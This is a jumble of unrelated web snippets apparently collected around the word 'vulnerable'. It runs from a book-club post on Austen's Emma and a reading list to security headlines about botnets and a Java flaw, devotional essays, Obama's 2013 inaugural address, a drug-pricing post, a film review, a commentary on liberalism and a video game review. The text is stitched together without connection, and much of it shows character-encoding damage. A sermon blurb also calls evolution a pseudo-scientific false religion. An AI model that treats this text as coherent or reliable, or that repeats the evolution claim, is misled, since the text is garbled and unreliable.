I must see somebody very superior to any one I have seen yet, to be tempted [to marry]... I would rather not be tempted. I cannot really change for the better.
I know there is plenty more in the story to talk about (and I'm curious to hear what stood out most to you!), but since I feel like humility is a running theme in my life (as something I need to continually learn and grow in)âit's even in my blog title :) âI wanted to take a moment to address Emma's pride.
How easy it is to let pride creep into our relationships. To feel like it's all about us and our accomplishments and the things we feel we "deserve." Granted, there is the other extreme that always gives without being restored and refuses to stand up when things are wrong. But I think I find it easier, myself, to fall into the prideful spectrum. I think this line from the first chapter is something I can relate to...
All that to say, I see Emma's tale as a bit of a cautionary one, and I'm sure there's a lot still to learn from her story!
Feel free to answer one, two, three, or all four of these questions in the comments section or in your own blog post!
1. What are your first impressions of Mr. Knightley and his relationship with Emma? Do his words about her and his attitude toward her suggest genuine care or a sense of superiority?
2. Mr. Knightley tells Emma, "You have been no friend to Harriet Smith" (ch. 8). To what degree do you agree or disagree with this statement based on Emma's thoughts and actions?
3. Who is your favorite secondary character so far? (Someone besides Emma or Mr. Knightley.) What do you admire or find interesting about that character?
4. Which Woodhouse do you most closely match: Emma, her sister (Isabella), or her father?
Join us next Sunday for our second discussion!
(Vol. I: Ch. 14-18 and Vol. II: Ch. 1-10)
|For the Love of Nonfiction (The Surprising Confessions of a Fiction Fangirl)|
I have a picture frame hanging on the wall near my front door. Beneath the collage of my loved ones and me rests this saying: Life makes the best story of all.
Over the past few months, I've been reveling in the story of life...the twists and turns and beautiful adventures that end up so much more unique and challenging and grand than you could have anticipated. And don't get me wrong: I've been enjoying plenty of fictitious journeys along the way, because there's something special about meeting new characters and learning more about love and life through their ups and downs.
Yes, I still love a good novel. I've just been pleasantly surprised to discover how precious nonfiction can be, and how it can enhance a life story in subtle, wonderful ways.
This fiction fangirl has discovered that nonfiction isn't always as dry and boring as she thought. Imagine that! :)
Instead of taking me on a fictional adventure, nonfiction has come alongside me on my real-life adventure and helped me ponder the paths I can take and the kind of person I can become. I'd love to share with you some of the titles that have blessed and blindsided me in really good ways...
- Blue Like Jazz, A Million Miles in a Thousand Years, and Scary Close by Donald Miller
I have become a huge fan of Donald Miller's work! His words comfort and challenge, shining a light that reveals surprising, relatable thoughts and makes the reader squirm and squint a bit. Do I always agree or understand? No. I found that the last part of Blue Like Jazz didn't resonate as well for me as the first two-thirds did. And yet I love, love, love that Don's books make me think and see new faith connections and insights.
Blue Like Jazz is inspiring and powerful with its deep spiritual themes. A Million Miles in a Thousand Years helped me see more clearly how analyzing stories - the elements of the fiction I love - can show me what it takes to make my own life story one full of meaningful scenes and ultimate purpose. And Scary Close shares some great thoughts on taking the risk of vulnerability in relationships.
- Simply Tuesday and A Million Little Ways by Emily P. Freeman
Of these two, I think Simply Tuesday stood out to me the most, but A Million Little Ways has some thought-provoking passages of its own! What does it look like to truly live life in the everyday sense? How would our lives be transformed if we embraced what awaits us on our ordinary Tuesdays? And what about art and calling? Does it have to look a certain way...or can Jesus shine through us in unexpected, everyday avenues that might look far different from our typical perception of a "calling"?
It's freeing to realize how beautifully extraordinary our ordinary days can be, because it's in these days that life actually happens. That's a lesson I think I can stand to keep learning and learning. :)
- I Don't Wait Anymore by Grace Thornton
This book is deceptively simple in some ways. But it packs a power punch as it makes you wonder, Am I fully surrendered to God? Am I willing to follow where He leads? Will I open my eyes to see the exciting possibilities awaiting me...and the people I can love right here and now?
I also love how this book encourages you to really prioritize being in Scripture, seeking God's amazing adventures by first spending time in His Word. And Grace's encouragement to come to the Bible with the goal of knowing God - not the goal of finding answers - may seem obvious when you hear it, but is truly revolutionary.
* * *
I've currently got my bookmarks in some other nonfiction titles, which I'm looking forward to reading more of soon...
- The Happiness Dare by Jennifer Dukes Lee
- You and Me Forever by Francis & Lisa Chan
- Prayer and the Art of Volkswagen Maintenance by Donald Miller [Yep, another Donald Miller book - published by Harvest House! :)]
- Love Does by Bob Goff [So far, this has been rather entertaining and inspiring!]
- Uninvited by Lysa Terkeurst [On my Fire tablet. I really liked The Best Yes, and Lysa has a great grasp of what it takes to write in a compelling, marketable way.]
* * *
As I mentioned earlier in this post, I've still been reading some fiction, and I hope to share some new reviews with you soon. :) But I've been getting such unexpected joy from reading nonfiction this year that I thought it would be worth sharing. While the growth these sorts of books encourage takes time, I'm hoping some of the beautiful truths and motivating questions will stick with me and continue to poke and prod me in good directions.
Tell me, friends, have you read some really compelling nonfiction (or fiction!) lately? It's been too long since I've checked in, and I'd love to hear about what you've been reading!
|Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/3GMhUIWs||2012-09-13 17:15:14 - ITVulnerability : Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/3GMhUIWs|
|RT @botnets_fr: RT @ericfreyss VulnÃ©rabilitÃ© Java CVE-2012-4681 â Et si on devenait enfin responsables Â« Blog CriminalitÃ©s numÃ©riques||2012-09-06 22:34:02 - CERTXMCO : RT @botnets_fr: RT @ericfreyss VulnÃ©rabilitÃ© Java CVE-2012-4681 â Et si on devenait enfin responsables Â« Blog CriminalitÃ©s numÃ©riques |
|http://tco/DARfhMBC The virus activity in August 2012: the growing botnets Java vulnerabilities and new threats to Android September 3,||2012-09-06 22:21:20 - netForensics : http://tco/DARfhMBC The virus activity in August 2012: the growing botnets Java vulnerabilities and new threats to Android September 3,|
|Suspected Mariposa botnet mastermind goes on trial http://tco/OuBCKPET||2012-08-08 05:49:17 - ITVulnerability : Suspected Mariposa botnet mastermind goes on trial http://tco/OuBCKPET|
|Peter: Learning from Life Experience|
How did the Lord take Peter, a man cut from such rough fabric, and refine him into a leader? For one thing, Christ made sure Peter had the kind of life experiences that would shape him into a godly leader. It is in this sense that true leaders are made, not just born.
Experience can be a hard teacher. In Peter’s case the ups and downs of his experience were dramatic and often painful. His life was filled with tortuous zigs and zags. The Lord dragged him through three years of tests and difficulties that gave him a lifetime of the kind of experiences every true leader must endure.
Why did Jesus do this? Did He take some glee in tormenting Peter? Not at all; the experiences—even the difficult ones—were all necessary to shape Peter into the man he needed to become.
He learned, for example, that crushing defeat and deep humiliation often follow hard on the heels of our greatest victories. Just after Christ commended him for his great confession in Matthew 16:16 (“You are the Christ, the Son of the living God”), Peter suffered the harshest rebuke ever recorded of a disciple in the New Testament. One moment Christ called Peter blessed, promising him the keys of the kingdom (Matthew 16:17–19). In the next paragraph, Christ addressed Peter as Satan and said, “Get behind me!” (Matthew 16:23)—meaning, “Don’t stand in My way!”
That incident occurred shortly after Peter’s triumphant confession. Jesus announced to the disciples that He was going to Jerusalem, where He would be turned over to the chief priests and scribes and be killed. Upon hearing that, “Peter took Him aside and began to rebuke Him, saying, ‘God forbid it Lord! This shall never happen to You!’” (Matthew 16:22). Peter’s sentiment is perfectly understandable. But he was thinking only from a human standpoint. He did not know the plan of God. Without realizing it, he was trying to dissuade Christ from the very thing He came to earth to do. As usual, he was speaking when he ought to have been listening. Jesus’ words to Peter were as stern as anything He ever spoke to any individual: “He turned and said to Peter, ‘Get behind Me, Satan! You are a stumbling block to Me; for you are not setting your mind on God’s interests, but man’s’” (Matthew 16:23).
Peter had just learned that God would reveal truth to him and guide his speech as he submitted his mind to the truth. He wasn’t dependent upon a human message. The message he was to proclaim was given to him by God (Matthew 16:17). He would also be given the keys to the kingdom—meaning that his life and message would be the unlocking of the kingdom of God for the salvation of many (Matthew 16:19).
But now, through the painful experience of being rebuked by the Lord, Peter also learned that he was vulnerable to Satan. Satan could fill his mouth just as surely as the Lord could fill it. If Peter minded the things of men rather than the things of God, or if he did not do the will of God, he could be an instrument of the enemy.
Later, Peter fell victim to Satan again on the night of Jesus’ arrest. This time he learned the hard way that he was humanly weak and could not trust his own resolve. All his boasting promises and earnest resolutions did not keep him from falling. After declaring in front of everyone that he would never deny Christ, he denied Him anyway, and he punctuated his denials with passionate curses. Satan was sifting him as wheat. Thus Peter learned how much chaff and how little substance there was in him and how watchful and careful he must be to rely only on the Lord’s strength.
At the same time, he learned that in spite of his own sinful tendencies and spiritual weaknesses, the Lord wanted to use him and would sustain him and preserve him no matter what.
All those things Peter learned by experience. Sometimes the experiences were bitter, distressing, humiliating, and painful. Other times they were encouraging, uplifting, and perfectly glorious—such as when Peter saw Christ’s divine brilliance on the Mount of Transfiguration. Either way, Peter made the most of his experiences, gleaning from them lessons that helped make him the great leader he became.
So far we’ve considered two of the three key elements of leadership that we can see in Peter’s life: He was made of the right raw material [hyperlink to previous post] and shaped by powerful life experiences. But it is the third key element that is foundational to everything else—the right character qualities. In the days ahead we’ll examine those character qualities that are so evident in the life of Peter.
(Adapted from Twelve Ordinary Men.)
|President Barack Obama 2013 Inauguration Speech|
Today President Barack Obama gave what will be known as a historic speech as far as LGBT Americans are concerned. It was the first time the word gay was used in an inaugural speech and it was used to speak about the need for equality. I was happy that my daughter was there in D.C. to hear her President speak so positively about her family. It was an amazing speech that drew on the fact that it was given on Martin Luther King, Jr. Day and made comparison to the civil rights struggles, women's rights and rights for gay Americans. It will be exciting to see how this sets up the State of the Union address and this coming session of Congress. While I believe the President will not do the work for us, he may be willing to be a more active advocate for us. But, I do believe that this President likes to see the American people involved in the process. He wants to see us use our voices and do everything we can to be heard and help to move our elected officials to take action. We must continue to lead this fight. However, the President is clearly in our corner.
Watch the President's speech. Full transcript follows the video
Vice President Biden, Mr. Chief Justice, Members of the United States Congress, distinguished guests, and fellow citizens:
Each time we gather to inaugurate a president, we bear witness to the enduring strength of our Constitution. We affirm the promise of our democracy. We recall that what binds this nation together is not the colors of our skin or the tenets of our faith or the origins of our names. What makes us exceptional â what makes us American â is our allegiance to an idea, articulated in a declaration made more than two centuries ago:
"We hold these truths to be self-evident, that all men are created equal, that they are endowed by their Creator with certain unalienable rights, that among these are Life, Liberty, and the pursuit of Happiness."
Today we continue a never-ending journey, to bridge the meaning of those words with the realities of our time. For history tells us that while these truths may be self-evident, they have never been self-executing; that while freedom is a gift from God, it must be secured by His people here on Earth. The patriots of 1776 did not fight to replace the tyranny of a king with the privileges of a few or the rule of a mob. They gave to us a Republic, a government of, and by, and for the people, entrusting each generation to keep safe our founding creed.
For more than two hundred years, we have.
Through blood drawn by lash and blood drawn by sword, we learned that no union founded on the principles of liberty and equality could survive half-slave and half-free. We made ourselves anew, and vowed to move forward together.
Together, we determined that a modern economy requires railroads and highways to speed travel and commerce; schools and colleges to train our workers.
Together, we discovered that a free market only thrives when there are rules to ensure competition and fair play.
Together, we resolved that a great nation must care for the vulnerable, and protect its people from life's worst hazards and misfortune.
Through it all, we have never relinquished our skepticism of central authority, nor have we succumbed to the fiction that all society's ills can be cured through government alone. Our celebration of initiative and enterprise; our insistence on hard work and personal responsibility, are constants in our character.
But we have always understood that when times change, so must we; that fidelity to our founding principles requires new responses to new challenges; that preserving our individual freedoms ultimately requires collective action. For the American people can no more meet the demands of today's world by acting alone than American soldiers could have met the forces of fascism or communism with muskets and militias. No single person can train all the math and science teachers we'll need to equip our children for the future, or build the roads and networks and research labs that will bring new jobs and businesses to our shores. Now, more than ever, we must do these things together, as one nation, and one people.
This generation of Americans has been tested by crises that steeled our resolve and proved our resilience. A decade of war is now ending. An economic recovery has begun. America's possibilities are limitless, for we possess all the qualities that this world without boundaries demands: youth and drive; diversity and openness; an endless capacity for risk and a gift for reinvention. My fellow Americans, we are made for this moment, and we will seize it â so long as we seize it together.
For we, the people, understand that our country cannot succeed when a shrinking few do very well and a growing many barely make it. We believe that America's prosperity must rest upon the broad shoulders of a rising middle class. We know that America thrives when every person can find independence and pride in their work; when the wages of honest labor liberate families from the brink of hardship. We are true to our creed when a little girl born into the bleakest poverty knows that she has the same chance to succeed as anybody else, because she is an American, she is free, and she is equal, not just in the eyes of God but also in our own.
We understand that outworn programs are inadequate to the needs of our time. We must harness new ideas and technology to remake our government, revamp our tax code, reform our schools, and empower our citizens with the skills they need to work harder, learn more, and reach higher. But while the means will change, our purpose endures: a nation that rewards the effort and determination of every single American. That is what this moment requires. That is what will give real meaning to our creed.
We, the people, still believe that every citizen deserves a basic measure of security and dignity. We must make the hard choices to reduce the cost of health care and the size of our deficit. But we reject the belief that America must choose between caring for the generation that built this country and investing in the generation that will build its future. For we remember the lessons of our past, when twilight years were spent in poverty, and parents of a child with a disability had nowhere to turn. We do not believe that in this country, freedom is reserved for the lucky, or happiness for the few. We recognize that no matter how responsibly we live our lives, any one of us, at any time, may face a job loss, or a sudden illness, or a home swept away in a terrible storm. The commitments we make to each other â through Medicare, and Medicaid, and Social Security â these things do not sap our initiative; they strengthen us. They do not make us a nation of takers; they free us to take the risks that make this country great.
We, the people, still believe that our obligations as Americans are not just to ourselves, but to all posterity. We will respond to the threat of climate change, knowing that the failure to do so would betray our children and future generations. Some may still deny the overwhelming judgment of science, but none can avoid the devastating impact of raging fires, and crippling drought, and more powerful storms. The path towards sustainable energy sources will be long and sometimes difficult. But America cannot resist this transition; we must lead it. We cannot cede to other nations the technology that will power new jobs and new industries â we must claim its promise. That is how we will maintain our economic vitality and our national treasure â our forests and waterways; our croplands and snowcapped peaks. That is how we will preserve our planet, commanded to our care by God. That's what will lend meaning to the creed our fathers once declared.
We, the people, still believe that enduring security and lasting peace do not require perpetual war. Our brave men and women in uniform, tempered by the flames of battle, are unmatched in skill and courage. Our citizens, seared by the memory of those we have lost, know too well the price that is paid for liberty. The knowledge of their sacrifice will keep us forever vigilant against those who would do us harm. But we are also heirs to those who won the peace and not just the war, who turned sworn enemies into the surest of friends, and we must carry those lessons into this time as well.
We will defend our people and uphold our values through strength of arms and rule of law. We will show the courage to try and resolve our differences with other nations peacefully â not because we are naÃ¯ve about the dangers we face, but because engagement can more durably lift suspicion and fear. America will remain the anchor of strong alliances in every corner of the globe; and we will renew those institutions that extend our capacity to manage crisis abroad, for no one has a greater stake in a peaceful world than its most powerful nation. We will support democracy from Asia to Africa; from the Americas to the Middle East, because our interests and our conscience compel us to act on behalf of those who long for freedom. And we must be a source of hope to the poor, the sick, the marginalized, the victims of prejudice â not out of mere charity, but because peace in our time requires the constant advance of those principles that our common creed describes: tolerance and opportunity; human dignity and justice.
We, the people, declare today that the most evident of truths â that all of us are created equal â is the star that guides us still; just as it guided our forebears through Seneca Falls, and Selma, and Stonewall; just as it guided all those men and women, sung and unsung, who left footprints along this great Mall, to hear a preacher say that we cannot walk alone; to hear a King proclaim that our individual freedom is inextricably bound to the freedom of every soul on Earth.
It is now our generation's task to carry on what those pioneers began. For our journey is not complete until our wives, our mothers, and daughters can earn a living equal to their efforts. Our journey is not complete until our gay brothers and sisters are treated like anyone else under the law â for if we are truly created equal, then surely the love we commit to one another must be equal as well. Our journey is not complete until no citizen is forced to wait for hours to exercise the right to vote. Our journey is not complete until we find a better way to welcome the striving, hopeful immigrants who still see America as a land of opportunity; until bright young students and engineers are enlisted in our workforce rather than expelled from our country. Our journey is not complete until all our children, from the streets of Detroit to the hills of Appalachia to the quiet lanes of Newtown, know that they are cared for, and cherished, and always safe from harm.
That is our generation's task â to make these words, these rights, these values â of Life, and Liberty, and the Pursuit of Happiness â real for every American. Being true to our founding documents does not require us to agree on every contour of life; it does not mean we will all define liberty in exactly the same way, or follow the same precise path to happiness. Progress does not compel us to settle centuries-long debates about the role of government for all time â but it does require us to act in our time.
For now decisions are upon us, and we cannot afford delay. We cannot mistake absolutism for principle, or substitute spectacle for politics, or treat name-calling as reasoned debate. We must act, knowing that our work will be imperfect. We must act, knowing that today's victories will be only partial, and that it will be up to those who stand here in four years, and forty years, and four hundred years hence to advance the timeless spirit once conferred to us in a spare Philadelphia hall.
My fellow Americans, the oath I have sworn before you today, like the one recited by others who serve in this Capitol, was an oath to God and country, not party or faction â and we must faithfully execute that pledge during the duration of our service. But the words I spoke today are not so different from the oath that is taken each time a soldier signs up for duty, or an immigrant realizes her dream. My oath is not so different from the pledge we all make to the flag that waves above and that fills our hearts with pride.
They are the words of citizens, and they represent our greatest hope.
You and I, as citizens, have the power to set this country's course.
You and I, as citizens, have the obligation to shape the debates of our time â not only with the votes we cast, but with the voices we lift in defense of our most ancient values and enduring ideals.
Let each of us now embrace, with solemn duty and awesome joy, what is our lasting birthright. With common effort and common purpose, with passion and dedication, let us answer the call of history, and carry into an uncertain future that precious light of freedom.
Thank you, God Bless you, and may He forever bless these United States of America.
|Watching Your Spiritual Diet|
Most of us have known people whose bodies have not grown or matured properly. It’s sad to encounter people with cognitive handicaps, brain damage, or other developmental obstacles that have hindered their growth. Many of them remain locked in a child-like state—others tragically don’t progress even that far.
In a similar way, some Christians remain locked in a perpetual state of spiritual infancy. However, unlike those suffering with mental handicaps, Christians struggling with arrested spiritual development have no one to blame but themselves.
All Christians are supposed to be growing in Christlikeness: “For those whom He foreknew, He also predestined to become conformed to the image of His Son” (Romans 8:29). But there is often a disconnect between Romans 8:29 and what we see happening in the church. Some Christians simply don’t grow. Spiritually they remain stunted, never becoming what God has called them to be.
Worse still, if you challenge these believers, they may deny culpability for their stunted growth and indignantly argue that they are growing—albeit at their own pace! Everybody wants to grow; it’s just that some people want to grow with no effort, and that’s where the problem lies.
While I was in college, I wasted my time and experienced little, if any, growth as a Christian. But when I began seminary I tasted God’s Word in a life-transforming way. During those seminary days I learned to study the Bible systematically, and that’s when I began to grow. Ever since that time I have found that my spiritual growth is directly proportionate to the amount of time and effort I put into the study of Scripture. And all of my experiences ministering to other Christians have only reinforced that conviction.
When believers aren’t growing, it’s almost always symptomatic of a failure to be in God’s Word. They may attend church regularly, but what they learn dissipates rapidly once they exit the building. They often complain that they’re not getting much out of church or the Christian life. They are weak and rundown when it comes to facing temptations, trials, problems, and challenges. They lack the vigor to do much of anything for the Lord.
The root cause of their arrested development is spiritual malnourishment—their souls are starved for wholesome spiritual food. The Bible refers to itself as milk, bread, and meat, but spiritually a lot of Christians are trying to survive and thrive on candy, Cokes, and fries. They aren’t growing because their diet is tragically deficient. Ironically, the solution to their problems is in the very thing they refuse to feed upon—God’s Word.
How to Eat Right and Grow Spiritually
There are several excellent biblical passages that talk about spiritual growth. One of the best, and certainly the most basic, is in Peter’s first epistle. Both of his New Testament letters were written to Christians under intense persecution. They had become the scapegoats of a vulnerable Roman empire, and the target of national angst and rage. On virtually every front—theologically, socially, politically—they were under attack. But the thrust of Peter’s message to them is clear: Don’t worry. Put your hope in Christ and learn to live in the light of His kingdom, not your present circumstances.
The Christian believers who read Peter’s letters probably weren’t too concerned about their spiritual growth. They were merely trying to survive. Yet, early in his first letter, Peter tells them that part of the reason they can have hope is because of the living Word of Christ:
Whether believers are recent converts or more mature in the faith, craving the Word of God is always essential to spiritual nourishment and growth (Job 23:12). Jesus affirmed this when He told Satan in the wilderness, “It is written, ‘Man shall not live on bread alone, but on every word that proceeds out of the mouth of God’” (Matthew 4:4).
Postmodern culture churns out an endless supply of distractions from God’s Word. Radio, television, films, the Internet, computer games, books, and magazines—all of which dull our appetites for genuine spiritual food. Christians must not allow themselves to be distracted from the nourishment that only God’s Word can provide.
Likewise, they must not be satisfied with the spiritual status quo. Peter’s exhortation strongly implies the necessity of discontentment with the present condition of spiritual development—that anyone who is growing spiritually must yearn to keep growing. Motivation for genuine spiritual growth flows out of a righteous discontentment, coupled with a sincere desire to be satisfied with nothing but the Word of God.
We’ll talk more about spiritual malnourishment and the dangers of spiritual junk food later in this series. For now, we want to focus on the character and nature of God’s Word as our only life-giving source of spiritual sustenance.
One of the many statements that the Bible makes concerning itself is that it is a “living Word.” In Philippians 2:16, Paul calls it the “word of life.” Hebrews 4:12 says, “The word of God is living and active.” Here in 1 Peter 1:23, it is “the living and enduring word of God.” There are no more significant or more important statements that refer to the Bible than these. It is through this living Word that we are born again and made alive spiritually. And it is through the living Word that we grow up into Christ.
In the days ahead, we’ll take a closer look at the vitality of God’s Word and what it means to feed on its life-giving power.
(Adapted from Why Believe the Bible.)
|Fridayâs Featured Sermon: âCreation: Believe It or Not, Part 1â|
Have you ever believed in evolution? Maybe you still do. It’s almost impossible to avoid indoctrination by this pseudo-scientific religion. Its tentacles have reached into every realm of education and the media.
Today, evolutionary theory is taught as historical fact. Most children are unlikely to be exposed to any alternative view of our origins in school or secular media. And in western countries outside the United States, skepticism regarding Darwin’s theory is almost non-existent. In fact, the expulsion of academics who deny, or even question, evolution is commonplace in colleges and universities.
Christians are likewise vulnerable to the dominant and intimidating sway evolution holds over our culture. Many scholars and preachers choose appeasement and compromise over biblical fidelity—trying to accommodate modern theory and ancient truth.
But John MacArthur argues that there is no way to insert billions of years and natural selection into the Bible’s opening chapter. You either believe Genesis 1, or you don’t. In his sermon, “Creation: Believe It or Not, Part 1,” John compares the biblical account of creation with the evolutionary worldview and finds zero compatibility between the two. Whether you’re a theistic evolutionist, progressive creationist, or hold to any other middle position, you are denying the straightforward biblical narrative found in Genesis 1.
While a literal understanding of Genesis is not essential for salvation, John points out that our view of the creation account has massive ramifications for fundamental Christian truths.
We don’t need to be intimidated by the aura of evolutionary theory. It’s just a false religion masquerading as scientific truth. In “Creation: Believe It or Not, Part 1,” John MacArthur shows us that God can be taken at His Word from the very first chapter.
Click here to listen to “Creation: Believe It or Not, Part 1.”
Being a security professional these days may seem to some like a never ending game of Whack-a-Mole. Once one problem, vulnerability or intrusion is taken care of, it seems inevitable that another problem pops up that needs whacking into submission.
|What I Told HHS Secretary Tom Price About the 340B Drug Pricing Program (rerun)|| This week, Iâm rerunning some popular posts while I'm on vacation. Click here to see the original post and comments from May 2017.|
This post is especially timely given President Trumpâs draft Executive Order. In Section 4, the Order directs Secretary Price to ensure that the program benefits "the lower income or otherwise vulnerable Americans for which the program was intended." Shortly after the article below was published, I discovered that the 340B program has been growing by more than 30% annually. (See The 340B Program Hits $16.2 Billion in 2016; Now 5% of U.S. Drug Market.) It's time to moderninze the 340B Drug Pricing Program.
In our meeting, I highlighted four ways that the 340B Drug Pricing Program is raising drug costs. I then offered eight specific recommendations for improving the program by addressing the widespread channel distortions the program has caused.
Read on for the recommendations and a summary of my comments to Dr. Price.
I have no idea if my suggestions will have any impact. Regardless, your friendly neighborhood blogger enjoyed spending time among some Washington insiders.
Read more Â»
|The Impact of the Proposed Republican Reforms to the Affordable Care Act|
The Impact of the Proposed Republican Reforms to the Affordable Care Act Americans have gotten their first glimpse of proposed Republican reforms to the Affordable Care Act (ACA) and the news is not good for those who suffer from addiction and other vulnerable populations. The changes could make it impossible for many who currently have […]
The post The Impact of the Proposed Republican Reforms to the Affordable Care Act appeared first on Cliffside Malibu.
|AAIFF â17: Absurd Accident|
Itâs a distinctly Chinese variant on film noirâthe noodle shop noir. This snappy debut, following in the loose tradition of Zhang Yimouâs A Woman, a Gun, and a Noodle Shop and Yong Qingâs Chongqing Hot Pot has all the elements. There is a flirtatious wife, a jealous husband, a jewel heist, and a remote noodle shop inn. Li Yuhe also pretty much throws in the kitchen sink for his first feature, Absurd Accident (trailer here), which screens during the 2017 Asian American International Film Festival.
Everyone is conning someone in this provincial town. Yang Baiwan thinks his wife Ma Lilian is unfaithful, but he is really getting played by bogus doctor of Chinese medicine, who represents himself as the front man for a Triad assassin named âMr. Marcus.â After Yang slips her a mickey and leaves to establish his alibi, the doctor arrives instead of Mr. Marcus, to start plundering the joint rather than bumping her off. However, when Ma prematurely comes to, she apparently kills her not-so would-be attacker in the ensuing struggle. Now she and the remorseful Yang have a body to dispose of.
Of course, it gets far more complicated. Two armed robbers, a country copper one night away from retirement, a gold-digger, and a clueless gamer she has mistaken for big game all lurch into the picture. The doctorâs body also keeps popping up where it is least expected and sometimes it is not entirely dead. All in all, it turns into an eight-car pile-up where noir intersects with farce.
Li is a little slow out of the blocks setting-up his characters and circumstances, but when Absurd gets going, it takes us off to the races with a high-performance sports car. One-darned-thing-after-another does not adequately describe the filmâs gleeful sense of mischief. It is more like half-a-dozen-things-after-the previous-half-dozen-things.
Ye Gao is amazing covering the waterfront as Ma, ranging from shrewishness to vulnerability and finally resting at utter bewilderment. Yet, somehow Suxi Ren manages to go to further extremes as the man-hunting Miss Guâshe is some serious trouble. There is something about Xixuâs performance that counteracts any empathy we might feel for the sad sack Yang, as all the troubles in the world rain down on his stooped shoulders. Thatâs a good thing, because it lets us enjoy the show without guilt.
Absurd is wonderfully sly and inventive. Li directs the chaotic traffic like an old pro, while the ensemble keeps the dialogue zinging and all the balls in the air, like veterans of vintage Howard Hawks comedies. Very highly recommended, Absurd Accident will be a heck of a good time for all present when it screens tomorrow (8/3) at the New York Asia Society as part of this yearâs AAIFF and it opens theatrically next Friday (8/11) in San Francisco, at the 4-Star Lee Neighborhood Theatre.
|UNICEF: El Poder de invertir en los niÃ±os y niÃ±as mÃ¡s pobres||Un estudio realizado por UNICEF en 51 paÃses, incluidos 5 de AmÃ©rica Latina y el Caribe (ALC), revelÃ³ que invertir en la salud de los niÃ±os mÃ¡s pobres y las comunidades mÃ¡s necesitadas es costo efectivo, genera un mayor impacto y reduce las desigualdades. “La evidencia demuestra que invertir en los niÃ±os mÃ¡s vulnerables no […]|
|Population connectivity and the effectiveness of marine protected areas to protect vulnerable, exploited and endemic coral reef fishes at an endemic hotspot|| van der Meer, M.H., Berumen, M.L., Hobbs, J.-P.A., and van Herwerden, L. (2015) Population connectivity and the effectiveness of marine protected areas to protect vulnerable, exploited and endemic coral reef fishes at an endemic hotspot. Coral Reefs, 34 (2). pp. 393-402. |
|Low genetic diversity and recovery implications of the vulnerable BankoualeÂ´ Palm Livistona carinensis (Arecaceae), from North-eastern Africa and the Southern Arabian Peninsula|| Shapcott, A., Dowe, J.L., and Ford, H. (2009) Low genetic diversity and recovery implications of the vulnerable BankoualeÂ´ Palm Livistona carinensis (Arecaceae), from North-eastern Africa and the Southern Arabian Peninsula. Conservation Genetics, 10 (2). pp. 317-327. |
|Liberalism, secular religion, vulnerability||There is a terrific review of a new book on liberalism over at First Things. The book is by a Polish philosopher named Ryszard Legutko, who was a dissident under the communist government and who believes that communism and liberalism share a similar secular religious framework. |
The review, by Adrian Vermeule, is difficult to improve on, so I will limit myself to some commentary on one of the key points raised and then encourage you to go and read the whole thing yourselves.
What I found most interesting was the discussion of some contradictions within liberalism. For instance, liberalism emphasises both a materialist determinism (i.e. everything we do is predetermined by forces of history, genetics etc.) and a belief in the radically autonomous individual, including the idea that individuals, absent certain social conditions, will use this autonomous freedom to choose the good. How can you have a radically self-determining individual if you believe that everything is materially predetermined? One part of liberal philosophy insists that the individual is radically predetermined, the other that he only has dignity if he is radically self-determined.
The most interesting contradiction discussed, and one that is complained about all the time in alt-right discussions on social media, is why liberals seem uninterested in seriously illiberal policies in places like Saudi Arabia but come down heavily on mildly illiberal policies in places like Hungary. I think the answer given by Legutko, as summarised by Vermeule, is very interesting:
Why do Western liberal academics and EU technocrats object so stridently to the mild illiberalism of the Fidesz parliamentary party in Hungary, while saying little or nothing about Saudi Arabia and other monarchical or authoritarian nations, nominal allies of the West, who routinely control, punish, and dominate women, gays, and religious dissenters? Why are the EU technocrats, whose forte is supposed to be competence, so very bumbling, making policy mistake after policy mistake? How is it possible that while the sitting president of the United States squarely opposed same-sex marriage just a few years ago, the liberal intellectuals who supported him passionately also condemn any opposition to same-sex marriage as bigotry, rooted in cultural backwardness? Why was the triumph of same-sex marriage followed so rapidly by the opening of a new regulatory and juridical frontier, the recognition of transgender identity?
If this is true, then it gives liberalism both a strength and a weakness. The strength is that people hold to liberal beliefs like a religion, and therefore as a source of meaning that is difficult to step away from. The weakness is that the force of the religious belief depends on an "eschatology" in which there is always a progress toward an ever more radical application of liberalism in society. Therefore, once liberalism is forced back it is vulnerable to collapse. In other words, if liberalism is seen to be obviously stopped, and some aspect of traditionalism restored, it is likely to trigger a psychological demoralisation amongst liberalism's adherents.
Liberalism needs opposition, it needs a force of reaction to battle against, but it needs to always win.
So we must not be content with being "house traditionalists" who exist merely to play a role within "the liturgy of liberalism." We need to be serious about building to the point that we are obviously regaining ground. At that point, liberals become vulnerable to psychological confusion and demoralisation. There may not be great depths of resistance once they lose a sense of inevitable progress.
Sinopse: Dom Cobb (DiCaprio) Ã© um ladrÃ£o habilidoso, o melhor de sua geraÃ§Ã£o, que extrai segredos valiosos das profundezas do inconsciente durante o sono com sonhos, quando a mente estÃ¡ mais vulnerÃ¡vel. Sua rara habilidade o tornou peÃ§a fundamental no traiÃ§oeiro mundo da espionagem industrial, mas tambÃ©m o tornou um fugitivo internacional e o fez perder tudo o que mais amava.
|Lionhead steps up for Fable III|
I'd just like to say that in my opinion, Fable III is by far the best of the Fable series in terms of storyline and overall combat. However, there were plenty of flaws as well.
First off, not having a start menu sucks, I mean really sucks. Its so counterintuative to video games that it gets me confused everytime I press the start button and I hear John Cleese's voice. This includes going to stores to try and sell your items or buy items, its very frustrating.
Second, the level system could've been done better. I think the concept of the Road to Rule has potential, but having to unlock the ability to use facial expressions, do jobs, and buy and sell property is a bit extreme.
Third, on the concept of facial expressions, what happened to the expression wheel where you could choose what action you wanted to perform. Ive never played patty-cake so much in my life to get people to like me!
Fourth, the combat got way too easy once you used the right combination from spell weaving. All you have to do is use shock and vortex and very very few enemies can even touch you while they are being shocked to death. The only enemies that actualy gave me trouble by the end of the game were the big mercanaries who threw dynamite and fireballs. Even the final battle wasn't difficult with a good ranged weapon.
I think melee was obsolete in this version of the game. Granted this is revolutionary times and in real life people were moving away from melee and towards guns. But melee fighting has been a cornerstone of Fable since the beginning. Making melee the most vulnerable and least effective attack was disheartening.
I've played through Fable III three times now, and no two times have been exactly alike and I absolutely LOVE that. From the development and look of my weapons to the amount of citizens I saved, so many things changed and it was great.
I love the humor tied into the storyline of Fable III, whether it was the cardboard quest, hobbe having a heartattack, or making the final judgement on my brother dressed as a chicken, there were many many times where I laughed out loud at this game. If you need more evidence just think about everything you did for "The Ham Sandwich."
I also liked how they developed your relationship with other people much more than previous Fable games. Especially Elise. However I really wish you could have a romantic tryst with Page.
Overall this game was extremely enjoyable and I am looking to any DLC they send out for it.
